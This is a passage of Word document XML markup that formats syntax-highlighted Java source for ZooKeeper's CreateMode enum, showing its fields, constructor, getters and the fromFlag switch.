    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    EPHEMERAL_SEQUENTIAL (</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>3</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>true</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>private</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>static</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Logger LOG = LoggerFactory.getLogger(CreateMode.</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>private</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> ephemeral;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>private</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> sequential;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>private</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> flag;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    CreateMode(</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> flag, </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> ephemeral, </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> sequential) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.flag = flag;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.ephemeral = ephemeral;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.sequential = sequential;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> isEphemeral() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> ephemeral;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> isSequential() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> sequential;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> toFlag() {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> flag;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>static</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode fromFlag(</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> flag) </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> KeeperException {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(flag) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>case</w:t>
      </w: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color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode.PERSISTENT;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>case</w:t>
      </w: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color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode.EPHEMERAL;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>case</w:t>
      </w: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color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode.PERSISTENT_SEQUENTIAL;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>case</w:t>
      </w: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color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>3</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode.EPHEMERAL_SEQUENTIAL ;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
